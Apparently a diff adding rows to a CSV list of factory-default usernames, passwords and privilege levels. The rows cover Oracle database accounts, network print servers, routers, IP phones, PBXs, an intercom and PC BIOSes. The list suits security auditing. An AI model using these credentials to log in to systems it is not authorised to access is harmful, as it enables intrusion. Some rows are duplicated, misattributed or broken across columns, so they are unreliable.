+oracle,Oracle RDBMS,,8i,SECDEMO,SECDEMO,,, +oracle,Oracle RDBMS,,8i,SYSMAN,oem_temp,,, +oracle,Oracle RDBMS,,8i,TSDEV,TSDEV,,, +oracle,Oracle RDBMS,,8i,TSUSER,TSUSER,,, +oracle,Oracle RDBMS,,8i,USER0,USER0,,, +oracle,Oracle RDBMS,,8i,USER1,USER1,,, +oracle,Oracle RDBMS,,8i,USER2,USER2,,, +oracle,Oracle RDBMS,,8i,USER3,USER3,,, +oracle,Oracle RDBMS,,8i,USER4,USER4,,, +oracle,Oracle RDBMS,,8i,USER5,USER5,,, +oracle,Oracle RDBMS,,8i,USER6,USER6,,, +oracle,Oracle RDBMS,,8i,USER7,USER7,,, +oracle,Oracle RDBMS,,8i,USER8,USER8,,, +oracle,Oracle RDBMS,,8i,USER9,USER9,,, +oracle,Oracle RDBMS,,8i,VRR1,VRR1,,, +oracle,Oracle RDBMS,,All Privileges with Admin,MDSYS,MDSYS,,, +oracle,Oracle RDBMS,,All Privileges,COMPANY,COMPANY,,, +oracle,Oracle RDBMS,,All Privileges,FINANCE,FINANCE,,, +oracle,Oracle RDBMS,,All Privileges,MFG,MFG,,, +oracle,Oracle RDBMS,,DBA +,SYS,CHANGE_ON_INSTALL,,, +oracle,Oracle RDBMS,,DBA,CTXSYS,CTXSYS,,, +oracle,Oracle RDBMS,,DBA,EVENT,EVENT,,, +oracle,Oracle RDBMS,,DBA,MODTEST,YES,,, +oracle,Oracle RDBMS,,DBA,PO,PO,,, +oracle,Oracle RDBMS,,DBA,PUBSUB,PUBSUB,,, +oracle,Oracle RDBMS,,DBA,SAMPLE,SAMPLE,,, +oracle,Oracle RDBMS,,DBA,SYSMAN,oem_temp,,, +oracle,Oracle RDBMS,,DBA,VRR1,VRR1,,, +oracle,Oracle RDBMS,,RESOURCE and CONNECT roles,DBSNMP,DBSNMP,,, +oracle,Oracle RDBMS,7 and 8,Multi,ADAMS,WOOD,,, +oracle,Oracle RDBMS,7 and 8,Multi,APPLSYS,APPLSYS,,, +oracle,Oracle RDBMS,7 and 8,Multi,APPS,APPS,,, +oracle,Oracle RDBMS,7 and 8,Multi,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,7 and 8,Multi,AURORA@ORB@UNAUTHENTICATED,INVALID,,, +oracle,Oracle RDBMS,7 and 8,Multi,BLAKE,PAPER,,, +oracle,Oracle RDBMS,7 and 8,Multi,CLARK,CLOTH,,, +oracle,Oracle RDBMS,7 and 8,Multi,CTXDEMO,CTXDEMO,,, +oracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,,,, +oracle,Oracle RDBMS,7 and 8,Multi,CTXSYS,CTXSYS,DBA,, +oracle,Oracle RDBMS,7 and 8,Multi,DBSNMP,DBSNMP,RESOURCE and CONNECT roles,, +oracle,Oracle RDBMS,7 and 8,Multi,DEMO,DEMO,,, +oracle,Oracle RDBMS,7 and 8,Multi,JONES,STEEL,,, +oracle,Oracle RDBMS,7 and 8,Multi,MDSYS,MDSYS,All Privileges with Admin,, +oracle,Oracle RDBMS,7 and 8,Multi,NAMES,NAMES,,, +oracle,Oracle RDBMS,7 and 8,Multi,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle RDBMS,7 and 8,Multi,ORDSYS,ORDSYS,,, +oracle,Oracle RDBMS,7 and 8,Multi,OUTLN,OUTLN,,, +oracle,Oracle RDBMS,7 and 8,Multi,RMAN,RMAN,,, +oracle,Oracle RDBMS,7 and 8,Multi,SCOTT,TIGER,,, +oracle,Oracle RDBMS,7 and 8,Multi,SYS,CHANGE_ON_INSTALL,DBA +,, +oracle,Oracle RDBMS,7 and 8,Multi,SYSADM,SYSADM,,, +oracle,Oracle RDBMS,7 and 8,Multi,SYSTEM,MANAGER,,, +oracle,Oracle RDBMS,7 and 8,Multi,TRACESRV,TRACE,,, +oracle,Oracle RDBMS,8i Linux,Multi,MODTEST,YES,DBA,, +oracle,Oracle RDBMS,8i WinNT,Multi,MTYSYS,MTYSYS,,, +oracle,Oracle RDBMS,8i WinNT,Multi,RE,RE,,, +oracle,Oracle RDBMS,8i WinNT,Multi,RMAIL,RMAIL,,, +oracle,Oracle RDBMS,8i WinNT,Multi,SAMPLE,SAMPLE,DBA,, +oracle,Oracle RDBMS,8i,Multi,AQDEMO,AQDEMO,,, +oracle,Oracle RDBMS,8i,Multi,AQUSER,AQUSER,,, +oracle,Oracle RDBMS,8i,Multi,CATALOG,CATALOG,,, +oracle,Oracle RDBMS,8i,Multi,CDEMO82,CDEMO82,,, +oracle,Oracle RDBMS,8i,Multi,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle RDBMS,8i,Multi,CDEMORID,CDEMORID,,, +oracle,Oracle RDBMS,8i,Multi,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle RDBMS,8i,Multi,COMPANY,COMPANY,All Privileges,, +oracle,Oracle RDBMS,8i,Multi,DEMO8,DEMO8,,, +oracle,Oracle RDBMS,8i,Multi,EMP,EMP,,, +oracle,Oracle RDBMS,8i,Multi,EVENT,EVENT,DBA,, +oracle,Oracle RDBMS,8i,Multi,FINANCE,FINANCE,All Privileges,, +oracle,Oracle RDBMS,8i,Multi,FND,FND,,, +oracle,Oracle RDBMS,8i,Multi,GPFD,GPFD,,, +oracle,Oracle RDBMS,8i,Multi,GPLD,GPLD,,, +oracle,Oracle RDBMS,8i,Multi,MFG,MFG,All Privileges,, +oracle,Oracle RDBMS,8i,Multi,MILLER,MILLER,,, +oracle,Oracle RDBMS,8i,Multi,MMO2,MMO2,,, +oracle,Oracle RDBMS,8i,Multi,MOREAU,MOREAU,,, +oracle,Oracle RDBMS,8i,Multi,OCITEST,OCITEST,,, +oracle,Oracle RDBMS,8i,Multi,PO,PO,DBA,, +oracle,Oracle RDBMS,8i,Multi,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle RDBMS,8i,Multi,PRIMARY,PRIMARY,,, +oracle,Oracle RDBMS,8i,Multi,PUBSUB,PUBSUB,DBA,, +oracle,Oracle RDBMS,8i,Multi,SECDEMO,SECDEMO,,, +oracle,Oracle RDBMS,8i,Multi,SYSMAN,oem_temp,DBA,, +oracle,Oracle RDBMS,8i,Multi,TSDEV,TSDEV,,, +oracle,Oracle RDBMS,8i,Multi,TSUSER,TSUSER,,, +oracle,Oracle RDBMS,8i,Multi,USER0,USER0,,, +oracle,Oracle RDBMS,8i,Multi,USER1,USER1,,, +oracle,Oracle RDBMS,8i,Multi,USER2,USER2,,, +oracle,Oracle RDBMS,8i,Multi,USER3,USER3,,, +oracle,Oracle RDBMS,8i,Multi,USER4,USER4,,, +oracle,Oracle RDBMS,8i,Multi,USER5,USER5,,, +oracle,Oracle RDBMS,8i,Multi,USER6,USER6,,, +oracle,Oracle RDBMS,8i,Multi,USER7,USER7,,, +oracle,Oracle RDBMS,8i,Multi,USER8,USER8,,, +oracle,Oracle RDBMS,8i,Multi,USER9,USER9,,, +oracle,Oracle RDBMS,8i,Multi,VRR1,VRR1,DBA,, +oracle,Oracle RDBMS,Any,Multi,system/manager,sys/change_on_install,Admin,, +oracle,Oracle,,,ADAMS,WOOD,,, +oracle,Oracle,,,ADLDEMO,ADLDEMO,,, +oracle,Oracle,,,ADMIN,JETSPEED,,, +oracle,Oracle,,,ADMINISTRATOR,ADMINISTRATOR,,, +oracle,Oracle,,,ANDY,SWORDFISH,,, +oracle,Oracle,,,AP,AP,,, +oracle,Oracle,,,APPLSYS,FND,,, +oracle,Oracle,,,APPLSYSPUB,FNDPUB,,, +oracle,Oracle,,,APPS,APPS,,, +oracle,Oracle,,,APPUSER,APPUSER,,, +oracle,Oracle,,,AQ,AQ,,, +oracle,Oracle,,,AQDEMO,AQDEMO,,, +oracle,Oracle,,,AQJAVA,AQJAVA,,, +oracle,Oracle,,,AQUSER,AQUSER,,, +oracle,Oracle,,,AUDIOUSER,AUDIOUSER,,, +oracle,Oracle,,,AURORA$JIS$UTILITY$,,,, +oracle,Oracle,,,AURORA$ORB$UNAUTHENTICATED,INVALID,,, +oracle,Oracle,,,BC4J,BC4J,,, +oracle,Oracle,,,BLAKE,PAPER,,, +oracle,Oracle,,,BRIO_ADMIN,BRIO_ADMIN,,, +oracle,Oracle,,,CATALOG,CATALOG,,, +oracle,Oracle,,,CDEMO82,CDEMO82,,, +oracle,Oracle,,,CDEMOCOR,CDEMOCOR,,, +oracle,Oracle,,,CDEMORID,CDEMORID,,, +oracle,Oracle,,,CDEMOUCB,CDEMOUCB,,, +oracle,Oracle,,,CENTRA,CENTRA,,, +oracle,Oracle,,,CIDS,CIDS,,, +oracle,Oracle,,,CIS,CIS,,, +oracle,Oracle,,,CISINFO,CISINFO,,, +oracle,Oracle,,,CLARK,CLOTH,,, +oracle,Oracle,,,COMPANY,COMPANY,,, +oracle,Oracle,,,COMPIERE,COMPIERE,,, +oracle,Oracle,,,CQSCHEMAUSER,PASSWORD,,, +oracle,Oracle,,,CSMIG,CSMIG,,, +oracle,Oracle,,,CTXDEMO,CTXDEMO,,, +oracle,Oracle,,,CTXSYS,CTXSYS,,, +oracle,Oracle,,,DBI,MUMBLEFRATZ,,, +oracle,Oracle,,,DBSNMP,DBSNMP,,, +oracle,Oracle,,,DEMO8,DEMO8,,, +oracle,Oracle,,,DEMO9,DEMO9,,, +oracle,Oracle,,,DES,DES,,, +oracle,Oracle,,,DEV2000_DEMOS,DEV2000_DEMOS,,, +oracle,Oracle,,,DIP,DIP,,, +oracle,Oracle,,,DISCOVERER_ADMIN,DISCOVERER_ADMIN,,, +oracle,Oracle,,,DSGATEWAY,DSGATEWAY,,, +oracle,Oracle,,,DSSYS,DSSYS,,, +oracle,Oracle,,,EJSADMIN,EJSADMIN,,, +oracle,Oracle,,,EMP,EMP,,, +oracle,Oracle,,,ESTOREUSER,ESTORE,,, +oracle,Oracle,,,EVENT,EVENT,,, +oracle,Oracle,,,EXFSYS,EXFSYS,,, +oracle,Oracle,,,FINANCE,FINANCE,,, +oracle,Oracle,,,FND,FND,,, +oracle,Oracle,,,FROSTY,SNOWMAN,,, +oracle,Oracle,,,GL,GL,,, +oracle,Oracle,,,GPFD,GPFD,,, +oracle,Oracle,,,GPLD,GPLD,,, +oracle,Oracle,,,HCPARK,HCPARK,,, +oracle,Oracle,,,HLW,HLW,,, +oracle,Oracle,,,HR,HR,,, +oracle,Oracle,,,IMAGEUSER,IMAGEUSER,,, +oracle,Oracle,,,IMEDIA,IMEDIA,,, +oracle,Oracle,,,JMUSER,JMUSER,,, +oracle,Oracle,,,JONES,STEEL,,, +oracle,Oracle,,,JWARD,AIROPLANE,,, +oracle,Oracle,,,L2LDEMO,L2LDEMO,,, +oracle,Oracle,,,LBACSYS,LBACSYS,,, +oracle,Oracle,,,LIBRARIAN,SHELVES,,, +oracle,Oracle,,,MASTER,PASSWORD,,, +oracle,Oracle,,,MDDEMO,MDDEMO,,, +oracle,Oracle,,,MDDEMO_CLERK,CLERK,,, +oracle,Oracle,,,MDDEMO_MGR,MGR,,, +oracle,Oracle,,,MDSYS,MDSYS,,, +oracle,Oracle,,,MFG,MFG,,, +oracle,Oracle,,,MGWUSER,MGWUSER,,, +oracle,Oracle,,,MIGRATE,MIGRATE,,, +oracle,Oracle,,,MILLER,MILLER,,, +oracle,Oracle,,,MMO2,MMO2,,, +oracle,Oracle,,,MODTEST,YES,,, +oracle,Oracle,,,MOREAU,MOREAU,,, +oracle,Oracle,,,MTSSYS,MTSSYS,,, +oracle,Oracle,,,MTS_USER,MTS_PASSWORD,,, +oracle,Oracle,,,MXAGENT,MXAGENT,,, +oracle,Oracle,,,NAMES,NAMES,,, +oracle,Oracle,,,OAS_PUBLIC,OAS_PUBLIC,,, +oracle,Oracle,,,OCITEST,OCITEST,,, +oracle,Oracle,,,ODM,ODM,,, +oracle,Oracle,,,ODM_MTR,MTRPW,,, +oracle,Oracle,,,ODS,ODS,,, +oracle,Oracle,,,ODSCOMMON,ODSCOMMON,,, +oracle,Oracle,,,OE,OE,,, +oracle,Oracle,,,OEMADM,OEMADM,,, +oracle,Oracle,,,OEMREP,OEMREP,,, +oracle,Oracle,,,OLAPDBA,OLAPDBA,,, +oracle,Oracle,,,OLAPSVR,INSTANCE,,, +oracle,Oracle,,,OLAPSYS,MANAGER,,, +oracle,Oracle,,,OMWB_EMULATION,ORACLE,,, +oracle,Oracle,,,OO,OO,,, +oracle,Oracle,,,OPENSPIRIT,OPENSPIRIT,,, +oracle,Oracle,,,ORACACHE,(random password),,, +oracle,Oracle,,,ORAREGSYS,ORAREGSYS,,, +oracle,Oracle,,,ORASSO,ORASSO,,, +oracle,Oracle,,,ORDPLUGINS,ORDPLUGINS,,, +oracle,Oracle,,,ORDSYS,ORDSYS,,, +oracle,Oracle,,,OSE$HTTP$ADMIN,(random password),,, +oracle,Oracle,,,OSP22,OSP22,,, +oracle,Oracle,,,OUTLN,OUTLN,,, +oracle,Oracle,,,OWA,OWA,,, +oracle,Oracle,,,OWA_PUBLIC,OWA_PUBLIC,,, +oracle,Oracle,,,OWNER,OWNER,,, +oracle,Oracle,,,PANAMA,PANAMA,,, +oracle,Oracle,,,PATROL,PATROL,,, +oracle,Oracle,,,PERFSTAT,PERFSTAT,,, +oracle,Oracle,,,PLEX,PLEX,,, +oracle,Oracle,,,PLSQL,SUPERSECRET,,, +oracle,Oracle,,,PM,PM,,, +oracle,Oracle,,,PO,PO,,, +oracle,Oracle,,,PO7,PO7,,, +oracle,Oracle,,,PORTAL30,PORTAL30,,, +oracle,Oracle,,,PORTAL30_DEMO,PORTAL30_DEMO,,, +oracle,Oracle,,,PORTAL30_PUBLIC,PORTAL30_PUBLIC,,, +oracle,Oracle,,,PORTAL30_SSO,PORTAL30_SSO,,, +oracle,Oracle,,,PORTAL30_SSO_PS,PORTAL30_SSO_PS,,, +oracle,Oracle,,,PORTAL30_SSO_PUBLIC,PORTAL30_SSO_PUBLIC,,, +oracle,Oracle,,,POWERCARTUSER,POWERCARTUSER,,, +oracle,Oracle,,,PRIMARY,PRIMARY,,, +oracle,Oracle,,,PUBSUB,PUBSUB,,, +oracle,Oracle,,,PUBSUB1,PUBSUB1,,, +oracle,Oracle,,,QDBA,QDBA,,, +oracle,Oracle,,,QS,QS,,, +oracle,Oracle,,,QS_ADM,QS_ADM,,, +oracle,Oracle,,,QS_CB,QS_CB,,, +oracle,Oracle,,,QS_CBADM,QS_CBADM,,, +oracle,Oracle,,,QS_CS,QS_CS,,, +oracle,Oracle,,,QS_ES,QS_ES,,, +oracle,Oracle,,,QS_OS,QS_OS,,, +oracle,Oracle,,,QS_WS,QS_WS,,, +oracle,Oracle,,,RE,RE,,, +oracle,Oracle,,,REPADMIN,REPADMIN,,, +oracle,Oracle,,,REPORTS_USER,OEM_TEMP,,, +oracle,Oracle,,,REP_MANAGER,DEMO,,, +oracle,Oracle,,,REP_OWNER,REP_OWNER,,, +oracle,Oracle,,,RMAIL,RMAIL,,, +oracle,Oracle,,,RMAN,RMAN,,, +oracle,Oracle,,,SAMPLE,SAMPLE,,, +oracle,Oracle,,,SAP,SAPR3,,, +oracle,Oracle,,,SDOS_ICSAP,SDOS_ICSAP,,, +oracle,Oracle,,,SECDEMO,SECDEMO,,, +oracle,Oracle,,,SERVICECONSUMER1,SERVICECONSUMER1,,, +oracle,Oracle,,,SH,SH,,, +oracle,Oracle,,,SITEMINDER,SITEMINDER,,, +oracle,Oracle,,,SLIDE,SLIDEPW,,, +oracle,Oracle,,,STARTER,STARTER,,, +oracle,Oracle,,,STRAT_USER,STRAT_PASSWD,,, +oracle,Oracle,,,SWPRO,SWPRO,,, +oracle,Oracle,,,SWUSER,SWUSER,,, +oracle,Oracle,,,SYMPA,SYMPA,,, +oracle,Oracle,,,SYS,D_SYSPW,,, +oracle,Oracle,,,SYSADM,SYSADM,,, +oracle,Oracle,,,SYSMAN,OEM_TEMP,,, +oracle,Oracle,,,SYSTEM,D_SYSTPW,,, +oracle,Oracle,,,TAHITI,TAHITI,,, +oracle,Oracle,,,TDOS_ICSAP,TDOS_ICSAP,,, +oracle,Oracle,,,TESTPILOT,TESTPILOT,,, +oracle,Oracle,,,TRACESVR,TRACE,,, +oracle,Oracle,,,TRAVEL,TRAVEL,,, +oracle,Oracle,,,TSDEV,TSDEV,,, +oracle,Oracle,,,TSUSER,TSUSER,,, +oracle,Oracle,,,TURBINE,TURBINE,,, +oracle,Oracle,,,ULTIMATE,ULTIMATE,,, +oracle,Oracle,,,USER,USER,,, +oracle,Oracle,,,USER0,USER0,,, +oracle,Oracle,,,USER1,USER1,,, +oracle,Oracle,,,USER2,USER2,,, +oracle,Oracle,,,USER3,USER3,,, +oracle,Oracle,,,USER4,USER4,,, +oracle,Oracle,,,USER5,USER5,,, +oracle,Oracle,,,USER6,USER6,,, +oracle,Oracle,,,USER7,USER7,,, +oracle,Oracle,,,USER8,USER8,,, +oracle,Oracle,,,USER9,USER9,,, +oracle,Oracle,,,UTLBSTATU,UTLESTAT,,, +oracle,Oracle,,,VIDEOUSER,VIDEO USER,,, +oracle,Oracle,,,VIF_DEVELOPER,VIF_DEV_PWD,,, +oracle,Oracle,,,VIRUSER,VIRUSER,,, +oracle,Oracle,,,VRR1,VRR1,,, +oracle,Oracle,,,WEBCAL01,WEBCAL01,,, +oracle,Oracle,,,WEBDB,WEBDB,,, +oracle,Oracle,,,WEBREAD,WEBREAD,,, +oracle,Oracle,,,WKSYS,WKSYS,,, +oracle,Oracle,,,WWW,WWW,,, +oracle,Oracle,,,WWWUSER,WWWUSER,,, +oracle,Oracle,,,XPRT,XPRT,,, +oracle,Oracle,,,demo,demo,,, +oracle,Oracle,,,internal,oracle,,, +oracle,Oracle,,,oracle,oracle,,, +oracle,Oracle,,,scott,tiger or tigger,,, +oracle,Oracle,,,sys,sys,,, +oracle,Oracle,,,system,manager,,, +oracle,Personal Oracle,,,PO8,PO8,,, +oracle,Personal Oracle,,8,PO8,PO8,,, +oracle,Personal Oracle,8,Multi,PO8,PO8,,, +oracle,Web DB,,,webdb,webdb,,, +oracle,Web DB,,Admin,webdb,webdb,,, +oracle,Web DB,,HTTP,webdb,webdb,Admin,, +orange,livebox,,,admin,admin,,, +osicom,JETXPrint,,1000E/B,sysadm,sysadm,,, +osicom,JETXPrint,,1000E/N,sysadm,sysadm,,, +osicom,JETXPrint,,1000T/N,sysadm,sysadm,,, +osicom,JETXPrint,,500 E/B,sysadm,sysadm,,, +osicom,JETXPrint,,Admin,sysadm,sysadm,,, +osicom,JETXPrint,1000E/B,Telnet,sysadm,sysadm,Admin,, +osicom,JETXPrint,1000E/N,Telnet,sysadm,sysadm,Admin,, +osicom,JETXPrint,1000T/N,Telnet,sysadm,sysadm,Admin,, +osicom,JETXPrint,500 E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETCommuter Remote Access Server,,,Manager,Manager,,, +osicom,NETCommuter Remote Access Server,,,debug,d.e.b.u.g,,, +osicom,NETCommuter Remote Access Server,,,echo,echo,,, +osicom,NETCommuter Remote Access Server,,,guest,guest,,, +osicom,NETCommuter Remote Access Server,,,sysadm,sysadm,,, +osicom,NETCommuter Remote Access Server,,Admin,Manager,Manager,,, +osicom,NETCommuter Remote Access Server,,Admin,sysadm,sysadm,,, +osicom,NETCommuter Remote Access Server,,Telnet,Manager,Manager,Admin,, +osicom,NETCommuter Remote Access Server,,Telnet,debug,d.e.b.u.g,User,, +osicom,NETCommuter Remote Access Server,,Telnet,echo,echo,User,, +osicom,NETCommuter Remote Access Server,,Telnet,guest,guest,User,, +osicom,NETCommuter Remote Access Server,,Telnet,sysadm,sysadm,Admin,, +osicom,NETCommuter Remote Access Server,,User,debug,d.e.b.u.g,,, +osicom,NETCommuter Remote Access Server,,User,echo,echo,,, +osicom,NETCommuter Remote Access Server,,User,guest,guest,,, +osicom,NETPrint and JETX Print,500 1000 1500 and 2000 Series,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,,1000 T/B,sysadm,sysadm,,, +osicom,NETPrint,,1000 T/N,sysadm,sysadm,,, +osicom,NETPrint,,1000E/B,sysadm,sysadm,,, +osicom,NETPrint,,1000E/D,Manager,Manager,,, +osicom,NETPrint,,1000E/D,debug,d.e.b.u.g,,, +osicom,NETPrint,,1000E/D,echo,echo,,, +osicom,NETPrint,,1000E/D,guest,guest,,, +osicom,NETPrint,,1000E/D,sysadm,sysadm,,, +osicom,NETPrint,,1000E/N,sysadm,sysadm,,, +osicom,NETPrint,,1000E/NDS,Manager,Manager,,, +osicom,NETPrint,,1000E/NDS,debug,d.e.b.u.g,,, +osicom,NETPrint,,1000E/NDS,echo,echo,,, +osicom,NETPrint,,1000E/NDS,guest,guest,,, +osicom,NETPrint,,1000E/NDS,sysadm,sysadm,,, +osicom,NETPrint,,1500 E/B,Manager,Manager,,, +osicom,NETPrint,,1500 E/B,debug,d.e.b.u.g,,, +osicom,NETPrint,,1500 E/B,echo,echo,,, +osicom,NETPrint,,1500 E/B,guest,guest,,, +osicom,NETPrint,,1500 E/B,sysadm,sysadm,,, +osicom,NETPrint,,1500E/N,Manager,Manager,,, +osicom,NETPrint,,1500E/N,debug,d.e.b.u.g,,, +osicom,NETPrint,,1500E/N,echo,echo,,, +osicom,NETPrint,,1500E/N,guest,guest,,, +osicom,NETPrint,,1500E/N,sysadm,sysadm,,, +osicom,NETPrint,,1500T/N,sysadm,sysadm,,, +osicom,NETPrint,,2000 T/B,sysadm,sysadm,,, +osicom,NETPrint,,2000 T/N,sysadm,sysadm,,, +osicom,NETPrint,,2000E/B,sysadm,sysadm,,, +osicom,NETPrint,,2000E/N,Manager,Manager,,, +osicom,NETPrint,,2000E/N,debug,d.e.b.u.g,,, +osicom,NETPrint,,2000E/N,echo,echo,,, +osicom,NETPrint,,2000E/N,guest,guest,,, +osicom,NETPrint,,2000E/N,sysadm,sysadm,,, +osicom,NETPrint,,500 E/B,sysadm,sysadm,,, +osicom,NETPrint,,500 E/N,sysadm,sysadm,,, +osicom,NETPrint,,500 T/B,sysadm,sysadm,,, +osicom,NETPrint,,500 T/N,sysadm,sysadm,,, +osicom,NETPrint,,Admin,Manager,Manager,,, +osicom,NETPrint,,Admin,sysadm,sysadm,,, +osicom,NETPrint,,User,debug,d.e.b.u.g,,, +osicom,NETPrint,,User,echo,echo,,, +osicom,NETPrint,,User,guest,guest,,, +osicom,NETPrint,1000 T/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000 T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/D,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1000E/D,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1000E/D,Telnet,echo,echo,User,, +osicom,NETPrint,1000E/D,Telnet,guest,guest,User,, +osicom,NETPrint,1000E/D,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1000E/NDS,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1000E/NDS,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1000E/NDS,Telnet,echo,echo,User,, +osicom,NETPrint,1000E/NDS,Telnet,guest,guest,User,, +osicom,NETPrint,1000E/NDS,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1500 E/B,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1500 E/B,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1500 E/B,Telnet,echo,echo,User,, +osicom,NETPrint,1500 E/B,Telnet,guest,guest,User,, +osicom,NETPrint,1500 E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1500E/N,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,1500E/N,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,1500E/N,Telnet,echo,echo,User,, +osicom,NETPrint,1500E/N,Telnet,guest,guest,User,, +osicom,NETPrint,1500E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,1500T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000 T/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000 T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,2000E/N,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,2000E/N,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,2000E/N,Telnet,echo,echo,User,, +osicom,NETPrint,2000E/N,Telnet,guest,guest,User,, +osicom,NETPrint,2000E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 1000 1500 and 2000 Series,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,500 E/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 E/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 T/B,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500 T/N,Telnet,sysadm,sysadm,Admin,, +osicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,Manager,Manager,Admin,, +osicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,debug,d.e.b.u.g,User,, +osicom,NETPrint,500,1000,1500, and 2000 Series,Telnet,echo,echo,User,, +osicom,NetPrint,500,1000,1500, and 2000 Series,Telnet,guest,guest,User,, +osicom,Osicom Plus T1/PLUS 56k,,,write,private,,, +osicom,Osicom Plus T1/PLUS 56k,,Telnet,write,private,,, +osicom,Osicom(Datacom),,,sysadm,sysadm,,, +ovislink,1184AR,all,multi,admin,12345,admin,, +ovislink,AirLive WIAS-1000G,,console,admin,admin,Admin,, +ovislink,BudgeTone 100 series IP Phone,1.1.0.11,,,123,Config (End User),, +ovislink,BudgeTone 100 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),, +ovislink,BudgeTone 200 series IP Phone,1.1.0.11,,,123,Config (End User),, +ovislink,BudgeTone 200 series IP Phone,1.1.0.11,,,admin,Config (Advanced User),, +ovislink,GXP-2000 IP Phone,1.0.1.9,http,,123,Config (End User),, +ovislink,GXP-2000 IP Phone,1.0.1.9,http,,admin,Config (Advanced User),, +ovislink,HandyTone-286 analog telephone adaptor,,,,123,config,, +ovislink,HandyTone-286 analog telephone adaptor,,,,admin,config,, +ovislink,HandyTone-486 analog telephone adaptor,,,,123,config,, +ovislink,HandyTone-486 analog telephone adaptor,,,,admin,config,, +ovislink,HandyTone-488 analog telephone adaptor,,,,123,Config (End User),, +ovislink,HandyTone-488 analog telephone adaptor,,,,admin,Config (Advanced User),, +ovislink,HandyTone-496 analog telephone adaptor,,,,123,Config (End User),, +ovislink,HandyTone-496 analog telephone adaptor,,,,admin,Config (Advanced User),, +ovislink,IWE1100 WLAN to LAN Bridge,,,root,root,Admin,, +ovislink,SHDSL Modem,B5.1 5-15-2002,,root,root,Admin,, +ovislink,SHDSL Modem,B5.1 5-15-2002,,user,user,Admin,, +ovislink,SR200 Router,,console,,,config,, +ovislink,SR500 Broadband IP Gateway,5.0 and up,http://192.168.1.254,,,config,, +ovislink,WL-1000UR,,http,admin,airlive,admin,, +ovislink,WL-1120AP,,Multi,root,,Admin,, +ovislink,WL-8000AP Wireless G,,http,12345,12345,Admin,, +pachco,AeGIS 9000,All,Console,,0000,Default master code - allows programming the unit,AeGIS 9000 entry intercom system - Hold 0 then # until scrolling stops, +pacific micro data,MAST 9500 Universal Disk Array,,Admin,pmd,,,, +pacific micro data,MAST 9500 Universal Disk Array,,ESM ver. 2.11 / 1,pmd,,,, +pacificmicrodata,MAST 9500 Universal Disk Array,ESM ver. 2.11 / 1,Console,pmd,,Admin,, +packard bell,PC BIOS,,,,bell9,,, +packard bell,PC BIOS,,Admin,,bell9,,, +packardbell,,EasyNote_MX37-U-103SP ,,administrador,1234,,, +packardbell,PC BIOS,,,459441,459441,,, +packardbell,PC BIOS,,Console,,bell9,Admin,, +packeteer,Packetshaper,,,,touchpwd=,,, +panasonic,CF-27,4,Multi,,,Admin,, +panasonic,CF-28,,Multi,,,Admin,, +panasonic,CF-45,,Multi,,,Admin,, +panasonic,KX-TD1232,,Multi,admin,1234,Admin,, +panasonic,KX-TDA 100,V1.1 2.0 3.0,CONSOLE,,1234,,, +panasonic,KX-TDA 200,V1.1 2.0 3.0,CONSOLE,,1234,,, +panasonic,KX-TDA 30,V1.1 2.0 3.0,CONSOLE,,1234,,, +panasonic,WV-NP240/244,V1.25-V1.50,http://192.168.0.10,admin,12345,,, +pandatel,EMUX,,,admin,admin,,, +pandatel,EMUX,,,admin,admin,,all, +patton,RAS,,2,monitor,monitor,,, +patton,RAS,,2,superuser,superuser,,, +patton,RAS,2,,monitor,monitor,,, +patton,RAS,2,,superuser,superuser,,, +pbx,PBX (Generic),,,tech,nician,,, +penril datability,vcp300 terminal server,,,,system,,, +penril datability,vcp300 terminal server,,Admin,,system,,, +penrildatability,vcp300 terminal server,,Multi,,system,Admin,, +pentagram,Cerberus ADSL modem + router,,HTTP,admin,password,Admin,, +pentaoffice,Sat Router,,Telnet,,pento,Admin,, +pentasafe,VigilEnt Security Manager,,3,PSEAdmin,$secure$,,, +pentasafe,VigilEnt Security Manager,,Admin,PSEAdmin,$secure$,,, +pentasafe,VigilEnt Security Manager,3,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,, +pentasafe,VigilEnt Security Manager,3.0,VigilEnt Security Manager Console,PSEAdmin,$secure$,Admin,, +perle,CS9000,any,Console,admin,superuser,Admin,, +philips,Praesideo PA System,,Admin,admin,admin,,, +philips,Praesideo PA System,,All versions,admin,admin,,, +philips,Praesideo PA System,All versions,Multi,admin,admin,Admin,, +phoenix,4.0,,Admin,,admin,,, 